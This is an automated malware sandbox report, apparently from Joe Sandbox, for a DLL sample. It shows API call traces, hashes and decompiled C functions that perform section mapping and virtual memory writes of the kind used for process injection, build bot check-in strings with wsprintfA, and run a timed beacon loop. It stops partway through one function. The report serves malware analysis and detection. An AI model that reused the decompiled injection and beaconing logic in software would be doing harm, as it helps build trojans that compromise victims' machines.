                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$AllocateLastMemoryStatusVirtual
                • String ID:
                • API String ID: 722216270-0
                • Opcode ID: 6324c8bf4d38934fffb3dbe92ab1cc154f8a40a847bbb5716a699376ff690e4f
                • Instruction ID: afcb091bc667973e7a69f4baca919a00150cc7738b4dda557a4ad549336d690d
                • Opcode Fuzzy Hash: 6324c8bf4d38934fffb3dbe92ab1cc154f8a40a847bbb5716a699376ff690e4f
                • Instruction Fuzzy Hash: F4F0FEB1911309FBEB05DB95D909BEE7BFCEB14345F104048A600AB180EBB8AB44DB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,046D63FB,00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 046D70CA
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 046D70D9
                • SetLastError.KERNEL32(00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 046D70E0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$LastMemoryStatusVirtualWrite
                • String ID:
                • API String ID: 1089604434-0
                • Opcode ID: ea17a231100b73700f8af404ce10ce8b7dd3121777b092a89564b848021e08d8
                • Instruction ID: 603497ddd3d84fa38b5c03bc3d7dcf9b7fdc337ebac248f7a136e81f774b2575
                • Opcode Fuzzy Hash: ea17a231100b73700f8af404ce10ce8b7dd3121777b092a89564b848021e08d8
                • Instruction Fuzzy Hash: B2E04F7660021AEBCF015EE9ED04DDB7BADEB48741B004020BE01D7160E736DC21ABE1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 21%
                			E01C13807(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                				void* _v8;
                				char _v12;
                				signed int _t37;
                				long _t39;
                				long _t40;
                				signed int _t41;
                				void* _t42;
                				signed int _t43;
                				intOrPtr _t44;
                				intOrPtr _t45;
                				intOrPtr _t46;
                				intOrPtr _t48;
                				void* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t68;
                				void* _t71;
                
                				_t68 = __esi;
                				_t65 = E01C123CC(_t37, _a4);
                				if(_t65 == 0) {
                					L18:
                					_t39 = GetLastError();
                				} else {
                					_t40 = GetVersion();
                					_t71 = _t40 - 6;
                					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
                						_a4 = 4;
                					} else {
                						_a4 = 0;
                					}
                					__imp__(_t65, _a4, 0, 0, 0); // executed
                					 *(_t68 + 0x10) = _t40;
                					_t41 = E01C12C11(_t65);
                					if( *(_t68 + 0x10) == 0) {
                						goto L18;
                					} else {
                						_t42 = E01C123CC(_t41,  *_t68);
                						_v8 = _t42;
                						if(_t42 == 0) {
                							goto L18;
                						} else {
                							_t67 = __imp__; // 0x6f99f5a0
                							if(_a8 == 0) {
                								L10:
                								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
                								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
                								_t43 = E01C12C11(_v8);
                								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                									goto L18;
                								} else {
                									_a4 = 0x100;
                									_t44 = E01C123CC(_t43,  *((intOrPtr*)(_t68 + 4)));
                									_v8 = _t44;
                									if(_t44 == 0) {
                										goto L18;
                									} else {
                										_t45 =  *0x1c1a2d8; // 0x55d5a8
                										_t21 = _t45 + 0x1c1b758; // 0x450047
                										_t46 = _t21;
                										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
                										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
                										E01C12C11(_v8);
                										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                										if(_t48 == 0) {
                											goto L18;
                										} else {
                											_v12 = 4;
                											__imp__(_t48, 0x1f,  &_a4,  &_v12);
                											if(_t48 != 0) {
                												_a4 = _a4 | 0x00000100;
                												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
                											}
                											_push(4);
                											_push( &_a8);
                											_push(6);
                											_push( *((intOrPtr*)(_t68 + 0x18)));
                											if( *_t67() == 0) {
                												goto L18;
                											} else {
                												_push(4);
                												_push( &_a8);
                												_push(5);
                												_push( *((intOrPtr*)(_t68 + 0x18)));
                												if( *_t67() == 0) {
                													goto L18;
                												} else {
                													_t39 = 0;
                												}
                											}
                										}
                									}
                								}
                							} else {
                								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
                								if(_t42 == 0) {
                									goto L18;
                								} else {
                									goto L10;
                								}
                							}
                						}
                					}
                				}
                				return _t39;
                			}


                APIs
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,01C11064,00000000,00000000,02179618,?,?,01C16C0C,?,02179618,0000EA60), ref: 01C13822
                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,01C11064,00000000,00000000,02179618,?,?,01C16C0C,?,02179618,0000EA60), ref: 01C13952
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                • String ID:
                • API String ID: 4097109750-0
                • Opcode ID: e3730aca285f9fb82071ae6187f914764a9f0a98fb5bcbdaeab80a5c4be015ac
                • Instruction ID: ea40f8f8af458cf570f1bd33826088f4510221add935e22142b339d5c3167981
                • Opcode Fuzzy Hash: e3730aca285f9fb82071ae6187f914764a9f0a98fb5bcbdaeab80a5c4be015ac
                • Instruction Fuzzy Hash: 0E419171580289FFEB309FA4CC45EAA7BB9FB06754F00442ABB4686094D770DA84EB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E01C12F8D(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E01C14AAF(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}


                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,01C122B9), ref: 01C12FEA
                  • Part of subcall function 01C14AAF: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,01C12FFF,00000002,00000000,?,?,00000000,?,?,01C12FFF,00000000), ref: 01C14ADC
                • memset.NTDLL ref: 01C1300C
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID:
                • API String ID: 2533685722-0
                • Opcode ID: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction ID: deb7d475d14768947b3c8781a62a9de51d866315ef42da1cbd627352bda07f2a
                • Opcode Fuzzy Hash: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction Fuzzy Hash: 0B2108B2D00209EFCB11DFA9C8849EEFBF9FB48354F104429E606F3210D731AA449B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressMemory64ProcReadVirtualWow64
                • String ID:
                • API String ID: 752694512-0
                • Opcode ID: 3b7722a316fc230f334a39d6706ad461c9a58d4a9bfc8c4d5628579a05494e04
                • Instruction ID: 65c4802f77e2c2357342f5defbef8b659ae491fea38a26ffab57393029a4fed8
                • Opcode Fuzzy Hash: 3b7722a316fc230f334a39d6706ad461c9a58d4a9bfc8c4d5628579a05494e04
                • Instruction Fuzzy Hash: 16F0497160020AAF9B018F86DC45CAEBBFAEB943207108019F504CB220E732E951DF20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E01C14AAF(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}


                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,01C12FFF,00000002,00000000,?,?,00000000,?,?,01C12FFF,00000000), ref: 01C14ADC
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: ef21dd3a25c13631b82ea961a4c94dcb6a4d1104665c74f0f4c8203d3e359383
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 1BF012B690020CFFDB119FA5CC85C9FBBBDEB44354B104939B152E1094D6309E089A60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction ID: 4ebb3dbb3ff9d19ed29bc5a71f2f7f7ae25cc7e3072ca276a1853459afbe8bf2
                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction Fuzzy Hash: D2F012B690020CFFDB119FA5CC85CDFBBBDEB48348F008829F542D1050E671AE599B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,046EE480), ref: 046DD6FA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: InformationProcessQuery
                • String ID:
                • API String ID: 1778838933-0
                • Opcode ID: 04eb8ccb0fea3bec62c1f7ee23a41e16c5943515e00bd19445822f27a24f49f9
                • Instruction ID: bafe934ff2079482ab48645bead01706126761b268ff4ffd2b0944d6abd6db1d
                • Opcode Fuzzy Hash: 04eb8ccb0fea3bec62c1f7ee23a41e16c5943515e00bd19445822f27a24f49f9
                • Instruction Fuzzy Hash: 70F03435B001259BCB20EE59D884DABBBECEB12799B505594E904EB251E321F906CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 68%
                			E01C174A5(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                				intOrPtr _v0;
                				intOrPtr _v4;
                				void* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v52;
                				void* __ecx;
                				void* __edi;
                				long _t29;
                				intOrPtr _t30;
                				intOrPtr _t31;
                				intOrPtr _t32;
                				intOrPtr _t33;
                				intOrPtr _t34;
                				void* _t37;
                				intOrPtr _t38;
                				int _t41;
                				void* _t42;
                				intOrPtr _t46;
                				intOrPtr _t47;
                				void* _t50;
                				intOrPtr _t54;
                				intOrPtr _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr _t66;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				intOrPtr _t78;
                				int _t81;
                				intOrPtr _t82;
                				int _t85;
                				intOrPtr _t87;
                				int _t90;
                				intOrPtr _t92;
                				int _t95;
                				intOrPtr* _t97;
                				intOrPtr* _t98;
                				void* _t99;
                				void* _t103;
                				void* _t104;
                				void* _t105;
                				intOrPtr _t106;
                				void* _t108;
                				int _t109;
                				void* _t110;
                				void* _t111;
                				void* _t113;
                				void* _t114;
                				void* _t116;
                
                				_t103 = __edx;
                				_t29 = __eax;
                				_t113 = _a20;
                				_v4 = 8;
                				if(__eax == 0) {
                					_t29 = GetTickCount();
                				}
                				_t30 =  *0x1c1a01c; // 0x8e501c47
                				asm("bswap eax");
                				_t31 =  *0x1c1a018; // 0x3a87c8cd
                				asm("bswap eax");
                				_t32 =  *0x1c1a014; // 0xd8d2f808
                				asm("bswap eax");
                				_t33 =  *0x1c1a010; // 0xeec43f25
                				asm("bswap eax");
                				_t34 =  *0x1c1a2d8; // 0x55d5a8
                				_t3 = _t34 + 0x1c1b633; // 0x74666f73
                				_t109 = wsprintfA(_t113, _t3, 2, 0x3f880, _t33, _t32, _t31, _t30,  *0x1c1a030,  *0x1c1a008, _t29);
                				_t37 = E01C163D2();
                				_t38 =  *0x1c1a2d8; // 0x55d5a8
                				_t4 = _t38 + 0x1c1b673; // 0x74707526
                				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                				_t116 = _t114 + 0x38;
                				_t110 = _t109 + _t41;
                				if(_a24 != 0) {
                					_t92 =  *0x1c1a2d8; // 0x55d5a8
                					_t8 = _t92 + 0x1c1b67e; // 0x732526
                					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t95; // executed
                				}
                				_t42 = E01C14A14(_t99); // executed
                				_t104 = _t42;
                				if(_t104 != 0) {
                					_t87 =  *0x1c1a2d8; // 0x55d5a8
                					_t10 = _t87 + 0x1c1b8cc; // 0x736e6426
                					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t90;
                					HeapFree( *0x1c1a290, 0, _t104);
                				}
                				_t105 = E01C13C13();
                				if(_t105 != 0) {
                					_t82 =  *0x1c1a2d8; // 0x55d5a8
                					_t12 = _t82 + 0x1c1b8d4; // 0x6f687726
                					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t85;
                					HeapFree( *0x1c1a290, 0, _t105);
                				}
                				_t106 =  *0x1c1a384; // 0x21795b0
                				_a24 = E01C129DC(0x1c1a00e, _t106 + 4);
                				_t46 =  *0x1c1a328; // 0x0
                				if(_t46 != 0) {
                					_t78 =  *0x1c1a2d8; // 0x55d5a8
                					_t15 = _t78 + 0x1c1b8ae; // 0x3d736f26
                					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                					_t116 = _t116 + 0xc;
                					_t110 = _t110 + _t81;
                				}
                				_t47 =  *0x1c1a324; // 0x0
                				if(_t47 != 0) {
                					_t75 =  *0x1c1a2d8; // 0x55d5a8
                					_t17 = _t75 + 0x1c1b885; // 0x3d706926
                					wsprintfA(_t110 + _t113, _t17, _t47);
                				}
                				if(_a24 != 0) {
                					_t50 = RtlAllocateHeap( *0x1c1a290, 0, 0x800); // executed
                					_t108 = _t50;
                					if(_t108 != 0) {
                						E01C16341(GetTickCount());
                						_t54 =  *0x1c1a384; // 0x21795b0
                						__imp__(_t54 + 0x40);
                						asm("lock xadd [eax], ecx");
                						_t58 =  *0x1c1a384; // 0x21795b0
                						__imp__(_t58 + 0x40);
                						_t60 =  *0x1c1a384; // 0x21795b0
                						_t61 = E01C152C4(1, _t103, _t113,  *_t60); // executed
                						_t111 = _t61;
                						asm("lock xadd [eax], ecx");
                						if(_t111 != 0) {
                							StrTrimA(_t111, 0x1c192a8);
                							_push(_t111);
                							_t66 = E01C15F46();
                							_a12 = _t66;
                							if(_t66 != 0) {
                								_t97 = __imp__;
                								 *_t97(_t111, _v0);
                								 *_t97(_t108, _v4);
                								_t98 = __imp__;
                								 *_t98(_t108, _v0);
                								 *_t98(_t108, _t111);
                								_t72 = E01C16BD0(0xffffffffffffffff, _t108, _v24, _v20); // executed
                								_v52 = _t72;
                								if(_t72 != 0 && _t72 != 0x10d2) {
                									E01C151B1();
                								}
                								HeapFree( *0x1c1a290, 0, _v16);
                							}
                							RtlFreeHeap( *0x1c1a290, 0, _t111); // executed
                						}
                						RtlFreeHeap( *0x1c1a290, 0, _t108); // executed
                					}
                					HeapFree( *0x1c1a290, 0, _a16);
                				}
                				RtlFreeHeap( *0x1c1a290, 0, _t113); // executed
                				return _a4;
                			}

                0x01c174a5
                0x01c174a5
                0x01c174ab
                0x01c174b1
                0x01c174b9
                0x01c174bb
                0x01c174bb
                0x01c174c8
                0x01c174d3
                0x01c174d6
                0x01c174e1
                0x01c174e4
                0x01c174e9
                0x01c174ec
                0x01c174f1
                0x01c174f4
                0x01c17500
                0x01c1750d
                0x01c1750f
                0x01c17515
                0x01c1751a
                0x01c17525
                0x01c17527
                0x01c1752a
                0x01c17531
                0x01c17533
                0x01c1753c
                0x01c17547
                0x01c17549
                0x01c1754c
                0x01c1754c
                0x01c1754e
                0x01c17553
                0x01c17557
                0x01c17559
                0x01c1755e
                0x01c1756a
                0x01c1756c
                0x01c17578
                0x01c1757a
                0x01c1757a
                0x01c17585
                0x01c17589
                0x01c1758b
                0x01c17590
                0x01c1759c
                0x01c1759e
                0x01c175aa
                0x01c175ac
                0x01c175ac
                0x01c175b2
                0x01c175c5
                0x01c175c9
                0x01c175d0
                0x01c175d3
                0x01c175d8
                0x01c175e3
                0x01c175e5
                0x01c175e8
                0x01c175e8
                0x01c175ea
                0x01c175f1
                0x01c175f4
                0x01c175f9
                0x01c17603
                0x01c17605
                0x01c1760d
                0x01c17620
                0x01c17626
                0x01c1762a
                0x01c17636
                0x01c1763b
                0x01c17644
                0x01c17655
                0x01c17659
                0x01c17662
                0x01c17668
                0x01c17670
                0x01c17675
                0x01c17682
                0x01c17688
                0x01c17694
                0x01c1769a
                0x01c1769b
                0x01c176a2
                0x01c176a6
                0x01c176ac
                0x01c176b3
                0x01c176ba
                0x01c176c0
                0x01c176c7
                0x01c176cb
                0x01c176d6
                0x01c176dd
                0x01c176e1
                0x01c176ea
                0x01c176ea
                0x01c176fb
                0x01c176fb
                0x01c1770a
                0x01c1770a
                0x01c17719
                0x01c17719
                0x01c1772b
                0x01c1772b
                0x01c1773a
                0x01c1774a

                APIs
                • GetTickCount.KERNEL32 ref: 01C174BB
                • wsprintfA.USER32 ref: 01C17508
                • wsprintfA.USER32 ref: 01C17525
                • wsprintfA.USER32 ref: 01C17547
                • wsprintfA.USER32 ref: 01C1756A
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1757A
                • wsprintfA.USER32 ref: 01C1759C
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C175AC
                • wsprintfA.USER32 ref: 01C175E3
                • wsprintfA.USER32 ref: 01C17603
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C17620
                • GetTickCount.KERNEL32 ref: 01C17630
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C17644
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C17662
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C152C4: strcpy.NTDLL ref: 01C1530E
                  • Part of subcall function 01C152C4: lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C152C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                • StrTrimA.SHLWAPI(00000000,01C192A8,?,021795B0), ref: 01C17694
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C15F46: lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                  • Part of subcall function 01C15F46: lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 01C176B3
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C176BA
                • lstrcat.KERNEL32(00000000,?), ref: 01C176C7
                • lstrcat.KERNEL32(00000000,00000000), ref: 01C176CB
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01C176FB
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 01C1770A
                • RtlFreeHeap.NTDLL(00000000,00000000,?,021795B0), ref: 01C17719
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1772B
                • RtlFreeHeap.NTDLL(00000000,?), ref: 01C1773A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                • String ID: Ut
                • API String ID: 628443468-8415677
                • Opcode ID: 6af0a701ad1cc7f1086a3f505f10bb490d0db6edd492e3588e11efe0b39ce885
                • Instruction ID: caf8d0abe348423fd21b0a85dfd8a8bda7febe2592291603a3081b225efedc5d
                • Opcode Fuzzy Hash: 6af0a701ad1cc7f1086a3f505f10bb490d0db6edd492e3588e11efe0b39ce885
                • Instruction Fuzzy Hash: 2471BD71181254EFD7229B68DC88F9637B8FB6B714F040518F90ED3258DB3AEA04AB65
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 142 1c1541f-1c15451 memset CreateWaitableTimerA 143 1c155d2-1c155d8 GetLastError 142->143 144 1c15457-1c154b0 _allmul SetWaitableTimer WaitForMultipleObjects 142->144 147 1c155dc-1c155e6 143->147 145 1c154b6-1c154b9 144->145 146 1c1553a-1c15540 144->146 148 1c154c4 145->148 149 1c154bb call 1c15cf6 145->149 150 1c15541-1c15545 146->150 154 1c154ce 148->154 155 1c154c0-1c154c2 149->155 152 1c15555-1c15559 150->152 153 1c15547-1c15549 150->153 152->150 156 1c1555b-1c15565 CloseHandle 152->156 153->152 157 1c154d2-1c154d7 154->157 155->148 155->154 156->147 158 1c154d9-1c154e0 157->158 159 1c154ea-1c15517 call 1c17253 157->159 158->159 160 1c154e2 158->160 163 1c15567-1c1556c 159->163 164 1c15519-1c15524 159->164 160->159 165 1c1558b-1c15593 163->165 166 1c1556e-1c15574 163->166 164->157 167 1c15526-1c15531 call 1c1611c 164->167 169 1c15599-1c155c7 _allmul SetWaitableTimer WaitForMultipleObjects 165->169 166->146 168 1c15576-1c15589 call 1c151b1 166->168 173 1c15536 167->173 168->169 169->157 172 1c155cd 169->172 172->146 173->146
                C-Code - Quality: 83%
                			E01C1541F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void _v48;
                				long _v52;
                				struct %anon52 _v60;
                				char _v72;
                				long _v76;
                				void* _v80;
                				union _LARGE_INTEGER _v84;
                				struct %anon52 _v92;
                				void* _v96;
                				void* _v100;
                				union _LARGE_INTEGER _v104;
                				long _v108;
                				struct %anon52 _v124;
                				long _v128;
                				struct %anon52 _t46;
                				void* _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t61;
                				long _t65;
                				struct %anon52 _t66;
                				intOrPtr _t68;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				void* _t76;
                				void* _t78;
                				void** _t82;
                				signed int _t86;
                				void* _t89;
                
                				_t76 = __edx;
                				_v52 = 0;
                				memset( &_v48, 0, 0x2c);
                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v60 = _t46;
                				if(_t46 == 0) {
                					_v92.HighPart = GetLastError();
                				} else {
                					_push(0xffffffff);
                					_push(0xff676980);
                					_push(0);
                					_push( *0x1c1a298);
                					_v76 = 0;
                					_v80 = 0;
                					L01C1807C();
                					_v84.LowPart = _t46;
                					_v80 = _t76;
                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                					_t51 =  *0x1c1a2c4; // 0x10c
                					_v76 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                					_v108 = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x1c1a2a4 = 5;
                						} else {
                							_t69 = E01C15CF6(_t76); // executed
                							if(_t69 != 0) {
                								goto L4;
                							}
                						}
                						_v104.LowPart = 0;
                						L6:
                						L6:
                						if(_v104.LowPart == 1 && ( *0x1c1a2b8 & 0x00000001) == 0) {
                							_v104.LowPart = 2;
                						}
                						_t74 = _v104.LowPart;
                						_t58 = _t74 << 4;
                						_t78 = _t89 + (_t74 << 4) + 0x38;
                						_t75 = _t74 + 1;
                						_v92.LowPart = _t74 + 1;
                						_t61 = E01C17253( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                						_v124 = _t61;
                						if(_t61 != 0) {
                							goto L17;
                						}
                						_t66 = _v92;
                						_t97 = _t66 - 3;
                						_v104.LowPart = _t66;
                						if(_t66 != 3) {
                							goto L6;
                						} else {
                							_t68 = E01C1611C(_t75, _t97,  &_v72, _a4, _a8); // executed
